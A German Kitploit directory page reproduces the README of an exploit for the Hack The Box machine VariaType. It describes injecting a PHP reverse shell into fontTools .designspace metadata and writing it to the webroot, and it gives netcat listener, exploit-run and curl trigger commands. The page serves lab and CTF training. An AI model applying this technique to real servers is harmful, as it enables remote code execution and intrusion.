Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-66034-htb-ctf — Exploit für die VariaType HTB-Maschine, der eine XML-Injection in fontTools ausnutzt, um RCE über einen PHP-Reverse-Shell-Payload in .designspace-Metadaten zu erreichen. | Kitploit
Tools/GitHubGitHub/jwsly12/cve-2025-66034-htb-ctf
Payload-GenerierungExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubjwsly12/cve-2025-66034-htb-ctf

CVE-2025-66034-htb-ctf

Exploit für die VariaType HTB-Maschine, der eine XML-Injection in fontTools ausnutzt, um RCE über einen PHP-Reverse-Shell-Payload in .designspace-Metadaten zu erreichen.

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-66034-htb-ctf

VariaType Exploit für den Generator variabler Schriftarten

Dieses Repository enthält einen speziellen Exploit für die VariaType-Maschine auf Hack The Box. Der Exploit nutzt eine Schwachstelle in der Art und Weise aus, wie die fontTools-Bibliothek oder die Webanwendung .designspace-XML-Dateien und Metadateninterpolationen verarbeitet, um eine Remote Code Execution (RCE) zu erreichen.

📝 Beschreibung

Die Schwachstelle liegt im Schriftgenerierungsprozess. Durch das Erstellen einer bösartigen designspace-Datei können wir eine PHP-Reverse-Shell-Nutzlast in die Metadaten der Schrift (insbesondere das <labelname>-Feld) einschleusen. Wenn der Server diese Dateien verarbeitet, um eine variable Schrift zu generieren, schreibt er die Ausgabe in einen benutzerdefinierten Pfad, sodass wir eine .php-Shell im Webroot ablegen können.

🛠️ Funktionen

  • Automatisierte Schriftgenerierung: Erstellt gültige Master-Schriften source-light.ttf und source-regular.ttf mit fontTools.
  • XML-Injection: Generiert eine bösartige designspace-Datei mit einer in CDATA verpackten PHP-Nutzlast.
  • Path Traversal / Beliebiges Datei-Schreiben: Versucht, die resultierende „Schrift“ als .php-Datei im öffentlichen Verzeichnis zu speichern.
  • Randomisierung: Erzeugt eindeutige Shell-Namen, um Konflikte zu vermeiden.

🚀 Voraussetzungen

Sie müssen Python 3 installiert haben sowie die folgenden Bibliotheken:

root@kitploit:~
pip install fontTools requests

💻 Verwendung

1. Starten Sie Ihren Listener

Auf Ihrem lokalen Rechner (oder Pwnbox) starten Sie einen Netcat-Listener:

root@kitploit:~
nc -lvnp 4444

2. Führen Sie den Exploit aus

Führen Sie das Skript mit Ihrer HTB-VPN-IP und dem Listener-Port aus:

root@kitploit:~
python3 exploit.py --ip <IHRE_IP> --port 4444

3. Lösen Sie die Shell aus

Wenn der Upload einen 200 OK (oder manchmal auch einen 500 zurückgibt, falls die Verarbeitung vor dem Fehler erfolgt), liefert das Skript den Dateinamen. Greifen Sie per curl oder über Ihren Browser darauf zu:

root@kitploit:~
curl http://portal.variatype.htb/shell_xxxxxx.php

⚙️ Argumente

⚠️ Haftungsausschluss

Dieses Skript ist nur für Bildungszwecke und autorisierte Penetrationstests bestimmt. Der Zugriff auf oder Angriff auf Ziele ohne vorherige Genehmigung ist illegal.


So verwenden Sie diese README:

  1. Speichern Sie den obigen Inhalt als README.md im selben Ordner wie Ihr Skript.
  2. Stellen Sie sicher, dass Ihr Skript exploit.py heißt, oder aktualisieren Sie den Dateinamen in den obigen Befehlen.
Tool herunterladen
ArgumentBeschreibungStandard
--ipIhre Listener-IP (VPN)Erforderlich
--portIhr Listener-PortErforderlich
--pathZielpfad für die Shell/var/www/portal.variatype.htb/public
--urlDer Upload-Endpunkthttp://variatype.htb/tools/.../process